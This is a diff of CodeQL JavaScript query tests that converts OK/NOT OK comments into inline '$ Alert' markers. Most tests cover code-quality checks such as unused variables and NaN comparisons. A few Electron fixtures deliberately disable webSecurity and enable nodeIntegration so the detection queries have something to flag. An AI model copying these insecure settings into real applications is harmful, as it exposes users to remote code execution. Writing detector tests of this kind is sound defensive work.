a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts index 178e2d04399e..fbb37b4b1ae6 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts @@ -4,4 +4,4 @@ export interface TypeA { field: TypeB } -export let valueA = valueB; // OK: these imports are not cyclic at runtime +export let valueA = valueB; // OK - these imports are not cyclic at runtime diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected index 34cf2d268dc8..f47146ae9b90 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected @@ -1,6 +1,6 @@ | istype.ts:18:15:18:18 | node | The parameter 'node' is never used. | | parameter_field.ts:6:15:6:15 | x | The parameter 'x' is never used. | | tst2.js:1:12:1:12 | x | The parameter 'x' is never used. | -| tst2.js:29:12:29:12 | x | The parameter 'x' is never used. | -| tst.js:7:32:7:34 | idx | The parameter 'idx' is never used. | -| tst.js:12:13:12:13 | x | The parameter 'x' is never used. | +| tst2.js:28:12:28:12 | x | The parameter 'x' is never used. | +| tst.js:6:32:6:34 | idx | The parameter 'idx' is never used. | +| tst.js:10:13:10:13 | x | The parameter 'x' is never used. | diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.qlref b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.qlref index b04f67ab67e4..840ecd233e83 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.qlref +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.qlref @@ -1 +1,2 @@ -Declarations/UnusedParameter.ql +query: Declarations/UnusedParameter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts index 1854dd539135..15bff6ed8921 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts @@ -12,10 +12,10 @@ class SingletonTreeModel implements ITreeModel { isLeafNode(node: Node): node is LeafNode { return node instanceof LeafNode; } - isBranchNode(node: Node): node is BranchNode { // OK + isBranchNode(node: Node): node is BranchNode { return false; // This model has no branches. } - isValidNode(node: Node): boolean { // NOT OK + isValidNode(node: Node): boolean { // $ Alert return Node != null; // woops } } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts index fe32f6e80ea5..6ca356434eaf 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts @@ -1,7 +1,7 @@ class C { - constructor(public x: number) {} // OK + constructor(public x: number) {} } class D { - constructor(x: number) {} // NOT OK + constructor(x: number) {} // $ Alert } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts index 264928281a32..84aff19d331a 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts @@ -1,3 +1,3 @@ -function foo(this: void, x: number) { // OK: 'this' is not an ordinary parameter +function foo(this: void, x: number) { // OK - 'this' is not an ordinary parameter return x; } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js index cb7a02387c21..7e367fc67dfa 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js @@ -1,28 +1,26 @@ -// OK + [1, , 3].forEach(function(elt, idx) { console.log(idx + " is not omitted."); }); -// NOT OK -[1, , 3].forEach(function(elt, idx) { +[1, , 3].forEach(function(elt, idx) { // $ Alert sum += elt; }); -// NOT OK -function f1(x, y) { +function f1(x, y) { // $ Alert return y; } f1(23, 42); -// OK + function f2(x, y) { return y; } [].map(f2); -// OK + function f3(x, y) { return y; } @@ -30,11 +28,11 @@ function f3(x, y) { var g = f3; [].map(g); -// OK + define(function (require, exports, module) { module.x = 23; }); -// OK: starts with underscore +// OK - starts with underscore function f(_p) { } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js index 7621dca4b0da..89e4ed305f36 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js @@ -1,18 +1,18 @@ -function f(x, y) { // NOT OK +function f(x, y) { // $ Alert return y; } -function g(x, y) { // OK +function g(x, y) { return y + arguments[0]; } -function h(x) { // OK +function h(x) { function inner() { x = 1; } } -// OK + /** * @param {*} x the first argument, deliberately unused * @param {*} y the second argument @@ -21,16 +21,15 @@ function K(x, y) { return y; } -// NOT OK /** * @param {*} x the first argument * @param {*} y the second argument */ -function K(x, y) { +function K(x, y) { // $ Alert return y; } -// OK + /** * @abstract * @param {*} x the first argument diff --git a/javascript/ql/test/query-tests/Declarations/UnusedProperty/UnusedProperty.qlref b/javascript/ql/test/query-tests/Declarations/UnusedProperty/UnusedProperty.qlref index 9583241c2f0d..0dca4ee68e4e 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedProperty/UnusedProperty.qlref +++ b/javascript/ql/test/query-tests/Declarations/UnusedProperty/UnusedProperty.qlref @@ -1 +1,2 @@ -Declarations/UnusedProperty.ql +query: Declarations/UnusedProperty.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst.js b/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst.js index 847f30bd9443..d5e1525afac5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst.js @@ -1,7 +1,7 @@ (function(){ var captured1 = { used1: 42, - unused1: 42 + unused1: 42 // $ Alert }; captured1.used1; @@ -16,20 +16,20 @@ f(...{used6: 42}); [...{used7: 42}]; ({...{used8: 42}}); - ({ unused9: 42 }) + ""; + ({ unused9: 42 }) + ""; // $ Alert ({ used10: 42 }).hasOwnProperty; ({ used10: 42 }).propertyIsEnumerable; (function(){ var captured11 = { used11: 42, - unused11: 42 + unused11: 42 // $ Alert }; captured11.used11; var captured12 = { - used12_butNotReally: 42, - unused12: 42 + used12_butNotReally: 42, // $ Alert + unused12: 42 // $ Alert }; throw x; @@ -49,10 +49,10 @@ }); var captured14 = { - unused14: 42 + unused14: 42 // $ Alert }; - captured14.unused14 = 42; - captured14.unused14 = 42; + captured14.unused14 = 42; // $ Alert + captured14.unused14 = 42; // $ Alert var captured15 = { diff --git a/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst2.ts b/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst2.ts index 7ad7c508df8d..7906faf06c98 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst2.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst2.ts @@ -21,7 +21,7 @@ class C { } (function(){ - var o1: any = { p: 42, q: 42 }; + var o1: any = { p: 42, q: 42 }; // $ Alert o1.q; var o2: any = { p: 42, q: 42 }; var o3: { p: int, q: int } = o2; diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx b/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx index ac3df7f815ce..a8c86768ad1a 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx @@ -1,4 +1,4 @@ import { h } from 'preact'; // OK - JSX element uses 'h' after babel compilation -import { q } from 'preact'; // NOT OK - not used +import { q } from 'preact'; // $ Alert - not used export default (
    Hello
    ); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js index a77c7545deee..321a1df2f7b3 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js @@ -1,6 +1,6 @@ function sum(xs, i) { var res = 0; - for(;i++Hello); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts index 0fa2f18066c0..16e81a7f19de 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts @@ -1,10 +1,10 @@ -// OK: `SomeInterface` is used in an `implements` clause +// OK - `SomeInterface` is used in an `implements` clause import SomeInterface from 'somewhere'; class SomeClass implements SomeInterface { } new SomeClass(); -import SomethingElse from 'somewhere'; // OK: SomethingElse is used in a type +import SomethingElse from 'somewhere'; // OK - SomethingElse is used in a type type T = `Now for ${SomethingElse}`; diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts index bdcd767fae80..c90e8f8abb80 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts @@ -1,4 +1,4 @@ -import { Foo, Bar } from "somewhere"; // OK +import { Foo, Bar } from "somewhere"; // $ Alert type FooBar = T extends [infer S extends Foo, ...unknown[]] diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/multi-imports.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/multi-imports.js index b32fa341a832..be4b41caefb9 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/multi-imports.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/multi-imports.js @@ -1,4 +1,4 @@ -import {a, b, c, d} from 'x'; -import {ordered, alphabetically} from 'x'; +import {a, b, c, d} from 'x'; // $ Alert +import {ordered, alphabetically} from 'x'; // $ Alert c(); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts index 8749b3b059e4..336c20798120 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts @@ -1,6 +1,6 @@ -import * as X from "x"; // OK -import * as Y from "y"; // OK -import * as Z from "z"; // NOT OK +import * as X from "x"; +import * as Y from "y"; +import * as Z from "z"; // $ Alert function f(x: X) {} function g(x: Y.T) {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js index 70e8264f7050..5478d1d02da7 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js @@ -1,2 +1,2 @@ -// OK + module.exports = class C {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js index ac9bf939e31e..8c43db101c4f 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js @@ -1,2 +1,2 @@ -var React = x; // OK +var React = x; (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js index a68c0456cdf8..f58715a8a9b0 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js @@ -1,2 +1,2 @@ -var React = require("probably-react"); // OK +var React = require("probably-react"); (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js index 7137d8a44a9d..c6bcc81929e6 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js @@ -1,2 +1,2 @@ -var { React } = { React: require("probably-react") }; // OK +var { React } = { React: require("probably-react") }; (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js index 580680cdb682..c40e6c565daf 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js @@ -1,2 +1,2 @@ -var { React } = require("probably-react"); // OK +var { React } = require("probably-react"); (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js index 9ba55169e39d..11f6763cf3f5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js @@ -1,5 +1,5 @@ (function() { - var React = require("probably-react"); // NOT OK + var React = require("probably-react"); // $ Alert }) (function() { (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts index 07f817e287a8..5791afc6ed5c 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts @@ -1,4 +1,4 @@ -import { Foo, Bar, Baz } from "somewhere"; // OK +import { Foo, Bar, Baz } from "somewhere"; export function f(this: Foo) {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts index 8b157c18f8df..07c3bb0c50dc 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts @@ -1,6 +1,6 @@ -import { SomeInterface } from 'somwhere1'; // OK -import { AnotherInterface } from 'somwhere2'; // OK -import { foo } from 'somewhere3'; // OK +import { SomeInterface } from 'somwhere1'; +import { AnotherInterface } from 'somwhere2'; +import { foo } from 'somewhere3'; let x = "world"; diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts index 3a4c417daec3..5c5085a37285 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts @@ -1,12 +1,12 @@ -import fs = require('fs') // OK -import http = require('http') // OK +import fs = require('fs') +import http = require('http') export var mockFs : typeof fs = {} export var mockRequest : typeof http.ServerRequest = {} export function f() { - let x = 4 // OK - let y = 5 // NOT OK + let x = 4 + let y = 5 // $ Alert var t : typeof x = 20 return t } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts index 130a2a1db926..62a86545a4e0 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts @@ -1 +1 @@ -declare class UnusedClass {} // OK +declare class UnusedClass {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js index 75eade9c6f82..e25cb72b32a5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js @@ -1,10 +1,10 @@ function f(a) { - const [a, // OK: used - _, // OK: starts with underscore - _c, // OK: starts with underscore - d, // OK: used - e, // NOT OK - f] // NOT OK + const [a, // OK - used + _, // OK - starts with underscore + _c, // OK - starts with underscore + d, // OK - used + e, // $ Alert + f] // $ Alert = a; return a + d; } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts index 14ec99e02b5c..a04efbed8e1c 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts @@ -1,6 +1,6 @@ -import T from 'somewhere'; // NOT OK: `T` is unused (it is shadowed by another T) -import object from 'somewhere'; // NOT OK: `object` is unused (it is "shadowed" by a keyword) -import * as N from 'somewhere'; // OK: N is a namespace and thus not shadowed by 'interface N'. +import T from 'somewhere'; // $ Alert - `T` is unused (it is shadowed by another T) +import object from 'somewhere'; // $ Alert - `object` is unused (it is "shadowed" by a keyword) +import * as N from 'somewhere'; // OK - N is a namespace and thus not shadowed by 'interface N'. { var x: T = {}; diff --git a/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/AllowRunningInsecureContent.qlref b/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/AllowRunningInsecureContent.qlref index 35bbe5f2d4d1..2b32814badbe 100644 --- a/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/AllowRunningInsecureContent.qlref +++ b/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/AllowRunningInsecureContent.qlref @@ -1 +1,2 @@ -Electron/AllowRunningInsecureContent.ql \ No newline at end of file +query: Electron/AllowRunningInsecureContent.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DangerousWebPreferences.js b/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DangerousWebPreferences.js index 01828a0b9fd9..d1a878a6f846 100644 --- a/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DangerousWebPreferences.js +++ b/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DangerousWebPreferences.js @@ -3,8 +3,8 @@ const {BrowserWindow} = require('electron') function test() { var unsafe_used = { webPreferences: { - webSecurity: false, - allowRunningInsecureContent: true, + webSecurity: false, // $ Alert[js/disabling-electron-websecurity] + allowRunningInsecureContent: true, // $ Alert[js/enabling-electron-insecure-content] experimentalFeatures: true, enableBlinkFeatures: ['ExecCommandInJavaScript'], blinkFeatures: 'CSSVariables' diff --git a/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DisablingWebSecurity.qlref b/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DisablingWebSecurity.qlref index c2907c3bd577..7dcd5b81dbff 100644 --- a/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DisablingWebSecurity.qlref +++ b/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DisablingWebSecurity.qlref @@ -1 +1,2 @@ -Electron/DisablingWebSecurity.ql \ No newline at end of file +query: Electron/DisablingWebSecurity.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected index 674fd74caee2..25500de34863 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected @@ -1,5 +1,5 @@ | EnablingNodeIntegration.js:5:28:11:9 | {\\n ... } | The `nodeIntegrationInWorker` feature has been enabled. | | EnablingNodeIntegration.js:5:28:11:9 | {\\n ... } | The `nodeIntegration` feature has been enabled. | | EnablingNodeIntegration.js:15:22:20:9 | {\\n ... } | The `nodeIntegration` feature is enabled by default. | -| EnablingNodeIntegration.js:23:16:27:9 | { // NO ... } | The `nodeIntegration` feature is enabled by default. | +| EnablingNodeIntegration.js:23:16:27:9 | { // im ... } | The `nodeIntegration` feature is enabled by default. | | EnablingNodeIntegration.js:49:74:49:96 | {nodeIn ... : true} | The `nodeIntegration` feature has been enabled. | diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js index 5e1d0e95fb43..e002845d7995 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js @@ -1,32 +1,32 @@ const {BrowserWindow} = require('electron') function test() { - var unsafe_1 = { // NOT OK, both enabled + var unsafe_1 = { // both enabled webPreferences: { nodeIntegration: true, nodeIntegrationInWorker: true, plugins: true, webSecurity: true, sandbox: true - } + } // $ Alert }; - var options_1 = { // NOT OK, `nodeIntegrationInWorker` enabled + var options_1 = { // `nodeIntegrationInWorker` enabled webPreferences: { plugins: true, nodeIntegrationInWorker: false, webSecurity: true, sandbox: true - } + } // $ Alert }; - var pref = { // NOT OK, implicitly enabled + var pref = { // implicitly enabled plugins: true, webSecurity: true, sandbox: true - }; + }; // $ Alert - var options_2 = { // NOT OK, implicitly enabled + var options_2 = { webPreferences: pref, show: true, frame: true, @@ -34,7 +34,7 @@ function test() { minHeight: 300 }; - var safe_used = { // NOT OK, explicitly disabled + var safe_used = { // explicitly disabled webPreferences: { nodeIntegration: false, plugins: true, @@ -46,7 +46,7 @@ function test() { var w1 = new BrowserWindow(unsafe_1); var w2 = new BrowserWindow(options_1); var w3 = new BrowserWindow(safe_used); - var w4 = new BrowserWindow({width: 800, height: 600, webPreferences: {nodeIntegration: true}}); // NOT OK, `nodeIntegration` enabled + var w4 = new BrowserWindow({width: 800, height: 600, webPreferences: {nodeIntegration: true}}); // $ Alert - `nodeIntegration` enabled var w5 = new BrowserWindow(options_2); var w6 = new BrowserWindow(safe_used); } diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.qlref b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.qlref index b0315fd89ad5..d54f00166518 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.qlref +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.qlref @@ -1 +1,2 @@ -Electron/EnablingNodeIntegration.ql +query: Electron/EnablingNodeIntegration.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected index c82afd5c4cae..6ac9592a1bd2 100644 --- a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected +++ b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected @@ -1,3 +1,3 @@ | tst.js:2:9:2:24 | (x & (1< 0 | Potentially unsafe sign check of a bitwise operation. | -| tst.js:14:13:14:25 | (x >>> 0) > 0 | Potentially unsafe sign check of a bitwise operation. | -| tst.js:23:1:23:21 | (x & 0x ... 00) > 0 | Potentially unsafe sign check of a bitwise operation. | +| tst.js:13:13:13:25 | (x >>> 0) > 0 | Potentially unsafe sign check of a bitwise operation. | +| tst.js:21:1:21:21 | (x & 0x ... 00) > 0 | Potentially unsafe sign check of a bitwise operation. | diff --git a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.qlref b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.qlref index 07ff4053aefc..6dcd4ec7bef2 100644 --- a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.qlref +++ b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.qlref @@ -1 +1,2 @@ -Expressions/BitwiseSignCheck.ql \ No newline at end of file +query: Expressions/BitwiseSignCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js index 3006b9d28826..ef5d14506bc2 100644 --- a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js +++ b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js @@ -1,23 +1,21 @@ function bitIsSet(x, n) { - return (x & (1< 0; + return (x & (1< 0; // $ Alert } console.log(bitIsSet(-1, 31)); // prints 'false' (x & 3) > 0; // this is fine -// OK + x = -1; console.log((x | 0) > (0)); // prints 'false' -// NOT OK -console.log((x >>> 0) > 0); // prints 'true' +console.log((x >>> 0) > 0); // $ Alert - prints 'true' + -// OK console.log((x << 16 >> 16) > 0); // prints 'false' -// OK + (x & 256) > 0; -// NOT OK -(x & 0x100000000) > 0; \ No newline at end of file +(x & 0x100000000) > 0; // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected index 371b6251b87c..ae3d98f8f143 100644 --- a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected +++ b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected @@ -1,2 +1,2 @@ | tst.js:11:10:11:15 | y <= y | This expression compares $@ to itself. | tst.js:11:10:11:10 | y | y | -| tst.js:22:1:22:35 | (functi ... n() {}) | This expression compares $@ to itself. | tst.js:22:1:22:16 | (function() { }) | (function() { }) | +| tst.js:21:1:21:35 | (functi ... n() {}) | This expression compares $@ to itself. | tst.js:21:1:21:16 | (function() { }) | (function() { }) | diff --git a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.qlref b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.qlref index 37235c0e9dfd..ad4cbb7600e8 100644 --- a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.qlref +++ b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.qlref @@ -1 +1,2 @@ -Expressions/CompareIdenticalValues.ql \ No newline at end of file +query: Expressions/CompareIdenticalValues.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js index e6b2568239f0..b8b1b4c85dcb 100644 --- a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js +++ b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js @@ -8,38 +8,37 @@ function Rectangle(x, y, width, height) { Rectangle.prototype.contains = function(x, y) { return (this.x <= x && x < this.x+this.width) && - (y <= y && + (y <= y && // $ Alert y < this.y+this.height); }; -// OK + "true" == true; -// OK + f() != f(23); -// NOT OK -(function() { }) == (function() {}); +(function() { }) == (function() {}); // $ Alert + - // OK x === y; -// OK + true === false; -// OK + function isNan(n) { return n !== n; } -// OK + function checkNaN(x) { if (x === x) // check whether x is NaN return false; return true; } -// OK (though wrong in other ways) +// OK - though wrong in other ways function same(x, y) { if (x === y) return true; diff --git a/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/ComparisonWithNaN.qlref b/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/ComparisonWithNaN.qlref index d8b4e6b39a53..9147587a96a3 100644 --- a/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/ComparisonWithNaN.qlref +++ b/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/ComparisonWithNaN.qlref @@ -1 +1,2 @@ -Expressions/ComparisonWithNaN.ql \ No newline at end of file +query: Expressions/ComparisonWithNaN.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/tst.js b/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/tst.js index 0e65c179d140..a2a4feec0f54 100644 --- a/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/tst.js @@ -1,9 +1,9 @@ -x == NaN; -x != NaN; -x === NaN; -NaN !== x; -x < NaN; -NaN === NaN; +x == NaN; // $ Alert +x != NaN; // $ Alert +x === NaN; // $ Alert +NaN !== x; // $ Alert +x < NaN; // $ Alert +NaN === NaN; // $ Alert isNaN(x); function f(x, NaN) { diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateCondition/DuplicateCondition.qlref b/javascript/ql/test/query-tests/Expressions/DuplicateCondition/DuplicateCondition.qlref index da7e874d5026..4c5c9f527628 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateCondition/DuplicateCondition.qlref +++ 